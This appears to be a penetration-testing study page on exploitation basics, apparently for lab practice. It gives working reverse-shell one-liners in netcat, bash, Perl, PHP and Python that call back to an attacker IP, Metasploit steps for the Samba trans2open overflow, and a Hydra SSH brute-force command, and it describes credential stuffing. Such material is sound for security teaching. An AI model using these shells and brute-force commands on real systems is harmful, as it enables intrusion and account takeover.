Skip to content

Exploitation Basics

Reverse Shell vs Bind Shell

A very popular usage of Netcat and probably the most common use from penetration testing perspective are reverse shells and bind shells. A reverse shell is a shell initiated from the target host back to the attack box which is in a listening state to pick up the shell. A bind shell is setup on the target host and binds to a specific port to listens for an incoming connection from the attack box. In malicious software a bind shell is often revered to as a backdoor.

netcat GitHub examples of reverse shells.

Netcat reverse shell example

  • Setup a Netcat listener.
  • Connect to the Netcat listener from the target host.
  • Issue commands on the target host from the attack box.

First we setup a Netcat listener on the attack box which is listening on port 4444 with the following command:

nc –lvp 4444

Than we issue the following command on the target host to connect to our attack box (remember we have remote code execution on this box):

For Linux:

nc 192.168.100.113 4444 –e /bin/bash

For Windows:

nc.exe 192.168.100.113 4444 –e cmd.exe

On the attack box we now have a bash shell on the target host and we have full control over this box in the context of the account which initiated the reverse shell

Reverse shell without Netcat on the target host

One major downside on the shown example is that you need Netcat on that target host which is very often not the case in real world scenario’s. In some cases Netcat is present, or we have a way to install it, but in many cases we need to use alternatives ways to connect back to the attack box. Let’s have a look at a few alternative ways to setup a reverse shell.

Bash reverse shell

With can also use Bash to initiate a reverse shell from the target host to the attack box by using the following command:

bash -i >& /dev/tcp/192.168.100.113/4444 0>&1

Perl reverse shell

If Perl is present on that remote host we can also initiate a reverse shell using Perl. Run the following command on the target host to setup the reverse shell:

perl -e ‘use Socket;$i=”192.168.100.113″;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

PHP reverse shell

When PHP is present on the compromised host, which is often the case on webservers, it is a great alternative to Netcat, Perl and Bash. Let’s run the following code to use PHP for the reverse shell to the attack box:

php -r ‘$sock=fsockopen(“192.168.100.113”,4444);exec(“/bin/sh -i <&3 >&3 2>&3”);’

Python reverse shell

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.100.113”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Netcat Bind Shell

As we’ve mentioned earlier in this Hacking with Netcat tutorial a bind shell is a shell that binds to a specific port on the target host to listen for incoming connections. Let’s have a look at the visualization of a bind Netcat shell:

bind-shell

Netcat Bind shell example

Let’s see how this looks on the console:

bind-shell-example

Note

Reverse shell = Victime connects to us. Bind shell = we connect to the victime.

Staged vs Non-Staged Payloads

staged-vs non-staged

Important

Pay attention on the example: meterpreter_reverse_tcp (all in one line)=>Non-staged. Staged=>meterpreter/reverse_tcp / staged

Gaining Root with Metasploit

searchsploit samba 2.2

Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit)                | bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation  | linux/local/23674.txt
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)              | linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)                | osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)          | solaris_sparc/remote/16330.rb
Samba 2.2.8 - Brute Force Method Remote Command Execution
  • msfconsole search trans2open
  • use 1
  • options
  • show targets
  • run or exploit
  • set payload linux/x86/

Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit)                | bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation  | linux/local/23674.txt
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)              | linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)                | osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)          | solaris_sparc/remote/16330.rb
Samba 2.2.8 - Brute Force Method Remote Command Execution
/

Manual Exploitation 80/443

80/443 - OpenLuck https://www.exploit-db.com/exploits/764
                  https://github.com/heltonWernik/OpenLuck


139 - Potentialy vul: https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/linux/samba/trans2open
                    https://www.exploit-db.com/exploits/7
                    https://www.exploit-db.com/exploits/10

 SSH https://www.rapid7.com/db/modules/exploit/multi/ssh/sshexec/

Brute Force Attacks

/usr/share/wordlists/

hydra syntax

  • -l (user)
  • -P (passwd list)

hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.57.4:22 -t 4 -V

  • metasploit search ssh_login

Credential Stuffing

Injecting breached account credentials in hopes of account takeover

Burp intruder /Sniper for password spraying and Pitchfork for user and pass.